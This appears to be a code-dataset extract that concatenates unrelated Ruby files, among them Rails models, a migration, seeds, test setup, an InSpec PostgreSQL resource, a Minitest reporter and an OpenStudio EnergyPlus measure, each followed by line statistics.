# s.framework = "SomeFramework"
s.frameworks = 'AVFoundation','Foundation'
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# βββ Project Settings βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
s.vendored_frameworks = 'Rvs_Viewer.framework'
end
| 37.151079 | 96 | 0.594888 |
01dc2643ef8b39daf29488f7f966776b8e634270 | 66 | FactoryGirl.define do
factory :dropbox_token do
end
end
| 9.428571 | 27 | 0.712121 |
ffcaad18b5d41fb7aabd85ae39745ef625daf8c9 | 199 | class CreatePets < ActiveRecord::Migration[5.2]
def change
create_table :pets do |t|
t.string :name
t.string :species
t.integer :user_id
t.timestamps
end
end
end
| 16.583333 | 47 | 0.633166 |
ab7fd31305381ef52737b59db0e57c1ba72bf32c | 1,379 | class FranchiseProfileSearch < ActiveRecord::BaseWithoutTable
column :phrase, :string, ""
column :page, :integer, 1
column :per_page, :integer, 25
column :franchise_id, :integer
def self.per_page_select_options
[["25", "25"], ["50", "50"], ["100", "100"], ["250", "250"], ["500", "500"], ["1000", "1000"]]
end
def profiles
FranchiseProfile.paginate(
:conditions => conditions,
:per_page => per_page,
:order => order,
:page => page,
:joins => " INNER JOIN (profiles LEFT JOIN users ON profiles.id = users.profile_id) ON franchise_profiles.profile_id = profiles.id"
)
end
private
def conditions
rvalue = nil
if Site.current_site_id.not_nil? && !phrase.empty_or_nil?
rvalue = ["franchise_profiles.franchise_id = ? AND (#{like_conditions.join(" OR ")})"]
rvalue << self.franchise_id
like_conditions.length.times do
rvalue << "%#{phrase}%"
end
elsif Site.current_site_id.not_nil?
rvalue = ["franchise_profiles.franchise_id = ?", self.franchise_id]
end
rvalue
end
def order
"profiles.last_name, profiles.first_name"
end
def like_conditions
[
"users.login LIKE ?",
"profiles.email LIKE ?",
"profiles.first_name LIKE ?",
"profiles.last_name LIKE ?",
"franchise_profiles.profile_id LIKE ?"
]
end
end
| 26.018868 | 137 | 0.631617 |
21955e147ea5a2897864a41c3b7909a2fa7afb4a | 4,957 | # copyright: 2015, Vulcano Security GmbH
module Inspec::Resources
class Postgres < Inspec.resource(1)
name "postgres"
supports platform: "unix"
desc "The 'postgres' resource is a helper for the 'postgres_conf', 'postgres_hba_conf', 'postgres_ident_conf' & 'postgres_session' resources. Please use those instead."
attr_reader :service, :data_dir, :conf_dir, :conf_path, :version, :cluster
def initialize
# determine dirs and service based on versions
determine_dirs
determine_service
# print warnings if the dirs do not exist
verify_dirs
if [email protected]_s.empty? && !@conf_dir.to_s.empty?
@conf_path = File.join @conf_dir, "postgresql.conf"
else
@conf_path = nil
skip_resource "Seems like PostgreSQL is not installed on your system"
end
end
def to_s
"PostgreSQL"
end
private
def determine_dirs
if inspec.os.debian?
#
# https://wiki.debian.org/PostgreSql
#
# Debian allows multiple versions of postgresql to be
# installed as well as multiple "clusters" to be configured.
#
@version = version_from_psql || version_from_dir("/etc/postgresql")
unless @version.to_s.empty?
@cluster = cluster_from_dir("/etc/postgresql/#{@version}")
@conf_dir = "/etc/postgresql/#{@version}/#{@cluster}"
@data_dir = "/var/lib/postgresql/#{@version}/#{@cluster}"
end
else
@version = version_from_psql
if @version.to_s.empty?
if inspec.directory("/var/lib/pgsql/data").exist?
warn "Unable to determine PostgreSQL version: psql did not return" \
"a version number and unversioned data directories were found."
else
@version = version_from_dir("/var/lib/pgsql")
end
end
@data_dir = locate_data_dir_location_by_version(@version)
end
@conf_dir ||= @data_dir
end
def determine_service
@service = "postgresql"
if @version.to_i >= 10
@service += "-#{@version.to_i}"
elsif @version.to_f >= 9.4
@service += "-#{@version}"
end
end
def verify_dirs
unless inspec.directory(@conf_dir).exist?
warn "Default postgresql configuration directory: #{@conf_dir} does not exist. " \
"Postgresql may not be installed or we've misidentified the configuration " \
"directory."
end
unless inspec.directory(@data_dir).exist?
warn "Default postgresql data directory: #{@data_dir} does not exist. " \
"Postgresql may not be installed or we've misidentified the data " \
"directory."
end
end
def version_from_psql
return unless inspec.command("psql").exist?
inspec.command("psql --version | awk '{ print $NF }' | awk -F. '{ print $1\".\"$2 }'").stdout.strip
end
def locate_data_dir_location_by_version(ver = @version)
dir_list = [
"/var/lib/pgsql/#{ver}/data",
# for 10, the versions are just stored in `10` although their version `10.7`
"/var/lib/pgsql/#{ver.to_i}/data",
"/var/lib/pgsql/data",
"/var/lib/postgres/data",
"/var/lib/postgresql/data",
]
data_dir_loc = dir_list.detect { |i| inspec.directory(i).exist? }
if data_dir_loc.nil?
warn 'Unable to find the PostgreSQL data_dir in expected location(s), please
execute "psql -t -A -p <port> -h <host> -c "show hba_file";" as the PostgreSQL
DBA to find the non-standard data_dir location.'
end
data_dir_loc
end
def version_from_dir(dir)
dirs = inspec.command("ls -d #{dir}/*/").stdout
entries = dirs.lines.count
case entries
when 0
warn "Could not determine version of installed postgresql by inspecting #{dir}"
nil
when 1
warn "Using #{dirs}: #{dir_to_version(dirs)}"
dir_to_version(dirs)
else
warn "Multiple versions of postgresql installed or incorrect base dir #{dir}"
first = dir_to_version(dirs.lines.first)
warn "Using the first version found: #{first}"
first
end
end
def dir_to_version(dir)
dir.chomp.split("/").last
end
def cluster_from_dir(dir)
# Main is the default cluster name on debian use it if it
# exists.
if inspec.directory("#{dir}/main").exist?
"main"
else
dirs = inspec.command("ls -d #{dir}/*/").stdout.lines
if dirs.empty?
warn "No postgresql clusters configured or incorrect base dir #{dir}"
return nil
end
first = dirs.first.chomp.split("/").last
if dirs.count > 1
warn "Multiple postgresql clusters configured or incorrect base dir #{dir}"
warn "Using the first directory found: #{first}"
end
first
end
end
end
end
| 32.398693 | 173 | 0.611862 |
87a214b25a03961409477db67b31a0babd77e3a2 | 990 | # Blatantly stolen from somewhere!
require 'ansi/code'
require "minitest/reporters"
module Minitest
module Reporters
class LocalReporter < BaseReporter
include ANSI::Code
include RelativePosition
def start
super
end
def report
super
puts('Finished in %.5fs' % total_time)
print('%d tests, %d assertions, ' % [count, assertions])
color = failures.zero? && errors.zero? ? :green : :red
print(send(color) { '%d failures, %d errors, ' } % [failures, errors])
print(yellow { '%d skips' } % skips)
puts
end
def record(test)
super
print_colored_status(test)
print(" (%.2fs)" % test.time)
print pad_test(test.name.gsub(/^test_\d{4}_/,''))
puts
return if test.skipped?
if test.failure
print_info(test.failure); puts
end
end
def before_suite(suite)
puts suite
end
end
end
end
| 22.5 | 78 | 0.570707 |
030fe6dea3fa8d1c7ee879e59c02ee1e6f9cb698 | 319 | class Band < ActiveRecord::Base
validates(:band_name, :presence => true)
validates(:band_name, :uniqueness => true)
before_save(:capitalize_first_letter)
has_and_belongs_to_many :venues
private
define_method(:capitalize_first_letter) do
self.band_name=(band_name().downcase().capitalize)
end
end
| 26.583333 | 56 | 0.755486 |
388b883829c6fcf18794f5313a8aa65a553eb864 | 3,157 | # see the URL below for information on how to write OpenStudio measures
# http://nrel.github.io/OpenStudio-user-documentation/measures/measure_writing_guide/
# start the measure
class EnergyPlusMeasure < OpenStudio::Ruleset::WorkspaceUserScript
# human readable name
def name
return "NAME_TEXT"
end
# human readable description
def description
return "DESCRIPTION_TEXT"
end
# human readable description of modeling approach
def modeler_description
return "MODELER_DESCRIPTION_TEXT"
end
# define the arguments that the user will input
def arguments(workspace)
args = OpenStudio::Ruleset::OSArgumentVector.new
# the name of the zone to add to the model
zone_name = OpenStudio::Ruleset::OSArgument.makeStringArgument("zone_name", true)
zone_name.setDisplayName("New zone name")
zone_name.setDescription("This name will be used as the name of the new zone.")
args << zone_name
return args
end
# define what happens when the measure is run
def run(workspace, runner, user_arguments)
super(workspace, runner, user_arguments)
# use the built-in error checking
if !runner.validateUserArguments(arguments(workspace), user_arguments)
return false
end
# assign the user inputs to variables
zone_name = runner.getStringArgumentValue("zone_name", user_arguments)
# check the user_name for reasonableness
if zone_name.empty?
runner.registerError("Empty zone name was entered.")
return false
end
# get all thermal zones in the starting model
zones = workspace.getObjectsByType("Zone".to_IddObjectType)
# reporting initial condition of model
runner.registerInitialCondition("The building started with #{zones.size} zones.")
# add a new zone to the model with the new name
# http://apps1.eere.energy.gov/buildings/energyplus/pdfs/inputoutputreference.pdf#nameddest=Zone
new_zone_string = "
Zone,
#{zone_name}, !- Name
0, !- Direction of Relative North {deg}
0, !- X Origin {m}
0, !- Y Origin {m}
0, !- Z Origin {m}
1, !- Type
1, !- Multiplier
autocalculate, !- Ceiling Height {m}
autocalculate; !- Volume {m3}
"
idfObject = OpenStudio::IdfObject::load(new_zone_string)
object = idfObject.get
wsObject = workspace.addObject(object)
new_zone = wsObject.get
# echo the new zone's name back to the user, using the index based getString method
runner.registerInfo("A zone named '#{new_zone.getString(0)}' was added.")
# report final condition of model
finishing_zones = workspace.getObjectsByType("Zone".to_IddObjectType)
runner.registerFinalCondition("The building finished with #{finishing_zones.size} zones.")
return true
end
end
# register the measure to be used by the application
EnergyPlusMeasure.new.registerWithApplication
| 33.946237 | 101 | 0.65727 |
01bb9d06d5fedcf35e35743543ef7a1de28c63a4 | 1,702 | class TabularFormBuilder < ActionView::Helpers::FormBuilder
def select(field, select_options = nil, options = {})
select_options ||= []
super field, select_options, options
end
['text_field', 'text_area', 'password_field', 'date_select', 'check_box', 'file_field'].each do |selector|
src = <<-END_SRC
def #{selector}_with_label(field, options = {})
options.reverse_merge!(:class => 'string') if '#{selector}' == 'text_field'
@template.content_tag("tr",
@template.content_tag("th", label_fu(field)) +
@template.content_tag("td", #{selector}_without_label(field, options)))
end
alias_method_chain :#{selector}, :label
END_SRC
class_eval src, __FILE__, __LINE__
end
alias_method :super_select, :select
def select_with_label(field, select_options = nil, options = {})
@template.content_tag("tr",
@template.content_tag("th", label_fu(field)) +
@template.content_tag("td", select_without_label(field, select_options, options)))
end
def select_without_label(field, select_options = nil, options = {})
select_options ||= select_options_from_enum(field) || []
super_select field, select_options, options
end
def select(field, select_options = nil, options = {})
select_with_label field, select_options, options
end
def text_fields(*fields)
fields.inject('') do |res, field|
res << text_field(field)
end
end
private
def select_options_from_enum(field)
if object.class.respond_to?(:field_type) && object.class.field_type(field).respond_to?(:values)
object.class.field_type(field).values
end
end
end | 31.518519 | 109 | 0.668038 |
289a126a3edef2a170fdd9f95fe7815a0dcd5060 | 3,558 | # Run Coverage report
require 'simplecov'
SimpleCov.start do
add_filter 'spec/dummy'
add_group 'Controllers', 'app/controllers'
add_group 'Helpers', 'app/helpers'
add_group 'Mailers', 'app/mailers'
add_group 'Models', 'app/models'
add_group 'Views', 'app/views'
add_group 'Libraries', 'lib'
end
# Configure Rails Environment
ENV['RAILS_ENV'] = 'test'
require File.expand_path('../dummy/config/environment.rb', __FILE__)
require 'rspec/rails'
require 'database_cleaner'
require 'ffaker'
# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[File.join(File.dirname(__FILE__), 'support/**/*.rb')].each { |f| require f }
# Requires factories and other useful helpers defined in spree_core.
require 'spree/testing_support/authorization_helpers'
require 'spree/testing_support/capybara_ext'
require 'spree/testing_support/controller_requests'
require 'spree/testing_support/factories'
require 'spree/testing_support/url_helpers'
require 'capybara/rspec'
require 'capybara-screenshot'
require 'capybara-screenshot/rspec'
require 'capybara/rails'
# Requires factories defined in lib/spree_product_publishable/factories.rb
require 'spree_product_publishable/factories'
RSpec.configure do |config|
config.include FactoryBot::Syntax::Methods
Capybara.register_driver :chrome do |app|
Capybara::Selenium::Driver.new app,
browser: :chrome,
options: Selenium::WebDriver::Chrome::Options.new(args: %w[headless disable-gpu window-size=1920,1080])
end
Capybara.javascript_driver = :chrome
Capybara::Screenshot.register_driver(:chrome) do |driver, path|
driver.browser.save_screenshot(path)
end
# Infer an example group's spec type from the file location.
config.infer_spec_type_from_file_location!
# == URL Helpers
#
# Allows access to Spree's routes in specs:
#
# visit spree.admin_path
# current_path.should eql(spree.products_path)
config.include Spree::TestingSupport::UrlHelpers
# == Requests support
#
# Adds convenient methods to request Spree's controllers
# spree_get :index
config.include Spree::TestingSupport::ControllerRequests, type: :controller
# == Mock Framework
#
# If you prefer to use mocha, flexmock or RR, uncomment the appropriate line:
#
# config.mock_with :mocha
# config.mock_with :flexmock
# config.mock_with :rr
config.mock_with :rspec
config.color = true
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# Capybara javascript drivers require transactional fixtures set to false, and we use DatabaseCleaner
# to cleanup after each test instead. Without transactional fixtures set to false the records created
# to setup a test will be unavailable to the browser, which runs under a separate server instance.
config.use_transactional_fixtures = false
# Ensure Suite is set to use transactions for speed.
config.before :suite do
DatabaseCleaner.strategy = :transaction
DatabaseCleaner.clean_with :truncation
end
# Before each spec check if it is a Javascript test and switch between using database transactions or not where necessary.
config.before :each do
DatabaseCleaner.strategy = RSpec.current_example.metadata[:js] ? :truncation : :transaction
DatabaseCleaner.start
end
# After each spec clean the database.
config.after :each do
DatabaseCleaner.clean
end
config.fail_fast = ENV['FAIL_FAST'] || false
config.order = "random"
end
| 32.345455 | 124 | 0.760821 |
e9d288bc96c8b3d9469d5e06a7d4298830230e6e | 1,236 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
User.create!(name: "example person",
email: "[email protected]",
password: "foobar",
password_confirmation: "foobar",
admin: true,
activated: true,
activated_at: Time.zone.now)
99.times do |n|
name = Faker::Name.name
email = "example-#{n+1}@fake.com"
password = "password"
User.create!(name: name,
email: email,
password: password,
password_confirmation: password,
activated: true,
activated_at: Time.zone.now)
end
#microposts
users = User.order(:created_at).take(6)
50.times do
content = Faker::Lorem.sentence(5)
users.each { |user| user.microposts.create!(content: content ) }
end
# following relationships
users = User.all
user = users.first
following = users[2..50]
followers = users[3..40]
following.each { |followed| user.follow(followed) }
followers.each { |follower| follower.follow(user) } | 29.428571 | 111 | 0.700647 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.